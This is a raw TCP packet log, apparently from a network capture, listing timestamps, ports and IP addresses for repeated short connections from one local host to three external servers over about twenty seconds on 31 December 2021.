Dec 31, 2021 09:52:59.494816065 CET	49805	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:59.494864941 CET	49805	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:59.497719049 CET	49805	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:59.607383966 CET	49806	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:59.636734009 CET	10172	49806	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:59.636867046 CET	49806	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:59.637461901 CET	49806	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:59.666970968 CET	10172	49806	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:59.667689085 CET	10172	49806	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:59.667808056 CET	49806	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:59.668385029 CET	49806	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:59.672749043 CET	49806	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:59.672892094 CET	49806	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:59.692521095 CET	593	49805	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:59.701862097 CET	10172	49806	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:59.701900959 CET	10172	49806	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:59.741974115 CET	10172	49806	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:59.815623999 CET	10172	49806	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:59.815669060 CET	10172	49806	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:59.815742970 CET	49806	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:59.815782070 CET	49806	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:59.818012953 CET	49806	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:59.846798897 CET	10172	49806	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:59.935672045 CET	49808	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:59.935719967 CET	443	49808	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:59.935813904 CET	49808	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:59.936425924 CET	49808	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:59.936446905 CET	443	49808	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:00.518038034 CET	443	49808	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:00.518198013 CET	49808	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:00.518937111 CET	49808	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:00.518949986 CET	443	49808	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:00.541362047 CET	49808	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:00.541376114 CET	443	49808	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:00.541594982 CET	49808	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:00.541627884 CET	443	49808	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:01.359325886 CET	443	49808	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:01.359404087 CET	443	49808	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:01.359545946 CET	49808	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:01.420778036 CET	49808	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:01.420803070 CET	443	49808	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:01.732614994 CET	49810	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:01.917953968 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:01.922007084 CET	49810	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:02.339062929 CET	49810	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:02.524437904 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:02.524466038 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:02.524975061 CET	49810	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:02.525005102 CET	49810	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:02.530854940 CET	49810	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:02.530884981 CET	49810	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:02.711061954 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:02.715715885 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:02.715898991 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:02.715926886 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:02.716058016 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:03.180591106 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:03.180613995 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:03.180697918 CET	49810	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:03.180747986 CET	49810	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:03.183049917 CET	49810	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:03.294554949 CET	49812	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:03.323966980 CET	10172	49812	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:03.324073076 CET	49812	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:03.324673891 CET	49812	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:03.354006052 CET	10172	49812	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:03.354739904 CET	10172	49812	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:03.354837894 CET	49812	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:03.355354071 CET	49812	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:03.359369993 CET	49812	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:03.359471083 CET	49812	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:03.367945910 CET	593	49810	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:03.388907909 CET	10172	49812	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:03.388962030 CET	10172	49812	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:03.425944090 CET	10172	49812	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:03.500453949 CET	10172	49812	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:03.500468969 CET	10172	49812	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:03.500546932 CET	49812	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:03.500582933 CET	49812	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:03.502696991 CET	49812	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:03.531922102 CET	10172	49812	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:03.623245001 CET	49813	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:03.623301029 CET	443	49813	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:03.623483896 CET	49813	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:03.624147892 CET	49813	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:03.624175072 CET	443	49813	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:04.204896927 CET	443	49813	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:04.205048084 CET	49813	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:04.205528021 CET	49813	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:04.205539942 CET	443	49813	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:04.209722042 CET	49813	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:04.209731102 CET	443	49813	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:04.209827900 CET	49813	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:04.209837914 CET	443	49813	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:05.030394077 CET	443	49813	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:05.030473948 CET	443	49813	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:05.030560970 CET	49813	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:05.032902002 CET	49813	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:05.032927990 CET	443	49813	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:05.169783115 CET	49814	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:05.364478111 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:05.364609003 CET	49814	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:05.365394115 CET	49814	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:05.560174942 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:05.560373068 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:05.560482979 CET	49814	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:05.561335087 CET	49814	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:05.568747044 CET	49814	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:05.568864107 CET	49814	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:05.755958080 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:05.763446093 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:05.763586044 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:05.763602018 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:05.763613939 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:06.228349924 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:06.228390932 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:06.228564024 CET	49814	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:06.231914997 CET	49814	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:06.342163086 CET	49816	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:06.372638941 CET	10172	49816	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:06.372890949 CET	49816	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:06.373445988 CET	49816	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:06.403299093 CET	10172	49816	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:06.403714895 CET	10172	49816	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:06.403844118 CET	49816	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:06.404272079 CET	49816	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:06.407875061 CET	49816	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:06.407895088 CET	49816	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:06.426846027 CET	593	49814	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:06.437123060 CET	10172	49816	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:06.437182903 CET	10172	49816	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:06.476975918 CET	10172	49816	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:06.549128056 CET	10172	49816	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:06.549179077 CET	10172	49816	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:06.549487114 CET	49816	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:06.549515009 CET	49816	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:06.554792881 CET	49816	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:06.584345102 CET	10172	49816	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:06.673783064 CET	49817	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:06.673820019 CET	443	49817	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:06.673985004 CET	49817	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:06.675070047 CET	49817	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:06.675090075 CET	443	49817	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:07.245872974 CET	443	49817	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:07.246009111 CET	49817	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:07.246999025 CET	49817	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:07.247013092 CET	443	49817	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:07.253417015 CET	49817	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:07.253438950 CET	443	49817	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:07.253511906 CET	49817	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:07.253525019 CET	443	49817	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:08.055658102 CET	443	49817	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:08.055757046 CET	443	49817	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:08.055788040 CET	49817	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:08.055819988 CET	49817	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:08.058109999 CET	49817	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:08.058144093 CET	443	49817	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:08.170036077 CET	49818	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:08.360426903 CET	593	49818	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:08.360553980 CET	49818	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:08.361217976 CET	49818	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:08.551462889 CET	593	49818	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:08.551512957 CET	593	49818	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:08.551624060 CET	49818	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:08.552664995 CET	49818	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:08.558810949 CET	49818	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:08.559093952 CET	49818	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:08.742705107 CET	593	49818	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:08.749037027 CET	593	49818	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:08.749279022 CET	593	49818	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:08.749304056 CET	593	49818	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:09.214306116 CET	593	49818	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:09.214349985 CET	593	49818	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:09.214432955 CET	49818	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:09.214472055 CET	49818	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:09.216634035 CET	49818	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:09.326553106 CET	49819	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:09.357029915 CET	10172	49819	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:09.357161999 CET	49819	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:09.362792969 CET	49819	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:09.392293930 CET	10172	49819	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:09.392745018 CET	10172	49819	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:09.392823935 CET	49819	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:09.393476009 CET	49819	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:09.400238991 CET	49819	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:09.400444984 CET	49819	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:09.407907009 CET	593	49818	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:09.429394960 CET	10172	49819	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:09.429475069 CET	10172	49819	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:09.469486952 CET	10172	49819	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:09.542058945 CET	10172	49819	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:09.542082071 CET	10172	49819	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:09.542166948 CET	49819	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:09.542220116 CET	49819	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:09.544739962 CET	49819	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:09.573858023 CET	10172	49819	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:09.653908014 CET	49825	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:09.653964996 CET	443	49825	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:09.654031992 CET	49825	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:09.654627085 CET	49825	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:09.654644012 CET	443	49825	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:10.207406044 CET	443	49825	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:10.207535028 CET	49825	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:10.208261967 CET	49825	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:10.208281040 CET	443	49825	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:10.212157011 CET	49825	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:10.212186098 CET	443	49825	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:10.212271929 CET	49825	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:10.212287903 CET	443	49825	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:11.016669989 CET	443	49825	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:11.016784906 CET	49825	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:11.016807079 CET	443	49825	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:11.016830921 CET	443	49825	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:11.016882896 CET	49825	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:11.022250891 CET	49825	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:11.022284031 CET	443	49825	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:11.139457941 CET	49826	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:11.335027933 CET	593	49826	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:11.335155010 CET	49826	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:11.339998960 CET	49826	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:11.535203934 CET	593	49826	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:11.535301924 CET	593	49826	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:11.535444021 CET	49826	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:11.536889076 CET	49826	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:11.538597107 CET	49826	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:11.538674116 CET	49826	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:11.731930971 CET	593	49826	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:11.734487057 CET	593	49826	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:11.734529018 CET	593	49826	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:11.734554052 CET	593	49826	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:12.200123072 CET	593	49826	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:12.200174093 CET	593	49826	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:12.200263977 CET	49826	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:12.204160929 CET	49826	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:12.320514917 CET	49827	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:12.349633932 CET	10172	49827	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:12.350425005 CET	49827	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:12.354741096 CET	49827	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:12.383658886 CET	10172	49827	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:12.383965969 CET	10172	49827	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:12.384542942 CET	49827	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:12.384886026 CET	49827	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:12.387985945 CET	49827	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:12.388073921 CET	49827	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:12.399569035 CET	593	49826	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:12.416912079 CET	10172	49827	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:12.416949034 CET	10172	49827	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:12.416974068 CET	10172	49827	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:12.528538942 CET	10172	49827	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:12.528564930 CET	10172	49827	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:12.528682947 CET	49827	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:12.528732061 CET	49827	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:12.534966946 CET	49827	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:12.563922882 CET	10172	49827	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:12.666623116 CET	49828	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:12.666723013 CET	443	49828	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:12.667155981 CET	49828	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:12.675688028 CET	49828	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:12.675720930 CET	443	49828	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:13.324095011 CET	443	49828	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:13.324215889 CET	49828	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:13.325907946 CET	49828	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:13.325932980 CET	443	49828	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:13.330442905 CET	49828	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:13.330480099 CET	443	49828	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:13.330616951 CET	49828	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:13.330634117 CET	443	49828	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:14.189920902 CET	443	49828	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:14.190001965 CET	443	49828	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:14.190037012 CET	49828	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:14.190061092 CET	49828	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:14.192188025 CET	49828	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:14.192214966 CET	443	49828	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:14.313661098 CET	49831	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:14.499099016 CET	593	49831	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:14.499228954 CET	49831	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:14.500171900 CET	49831	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:14.685400963 CET	593	49831	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:14.685532093 CET	593	49831	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:14.685688972 CET	49831	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:14.686393976 CET	49831	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:14.691519976 CET	49831	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:14.691625118 CET	49831	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:14.871412992 CET	593	49831	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:14.877840996 CET	593	49831	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:14.877866983 CET	593	49831	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:14.878137112 CET	593	49831	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:15.342022896 CET	593	49831	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:15.342058897 CET	593	49831	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:15.342127085 CET	49831	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:15.344898939 CET	49831	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:15.476094007 CET	49837	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:15.504991055 CET	10172	49837	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:15.508222103 CET	49837	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:15.509145021 CET	49837	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:15.530788898 CET	593	49831	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:15.538047075 CET	10172	49837	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:15.538094044 CET	10172	49837	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:15.538331985 CET	49837	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:15.538820028 CET	49837	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:15.542372942 CET	49837	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:15.542512894 CET	49837	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:15.571221113 CET	10172	49837	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:15.571253061 CET	10172	49837	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:15.571274996 CET	10172	49837	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:15.684684992 CET	10172	49837	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:15.684710026 CET	10172	49837	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:15.684798002 CET	49837	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:15.684808969 CET	49837	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:15.687639952 CET	49837	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:15.717030048 CET	10172	49837	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:15.796555042 CET	49841	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:15.796610117 CET	443	49841	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:15.796720982 CET	49841	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:15.797346115 CET	49841	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:15.797373056 CET	443	49841	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:16.406198978 CET	443	49841	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:16.406322002 CET	49841	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:16.406986952 CET	49841	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:16.406999111 CET	443	49841	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:16.412053108 CET	49841	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:16.412067890 CET	443	49841	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:16.412204027 CET	49841	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:16.412214041 CET	443	49841	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:17.249407053 CET	443	49841	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:17.249517918 CET	443	49841	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:17.249569893 CET	49841	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:17.249610901 CET	49841	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:17.255460978 CET	49841	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:17.255521059 CET	443	49841	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:17.375271082 CET	49853	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:17.572310925 CET	593	49853	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:17.572463989 CET	49853	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:17.573185921 CET	49853	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:17.767843008 CET	593	49853	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:17.768085957 CET	593	49853	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:17.770232916 CET	49853	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:17.770711899 CET	49853	593	192.168.2.7	103.70.29.126
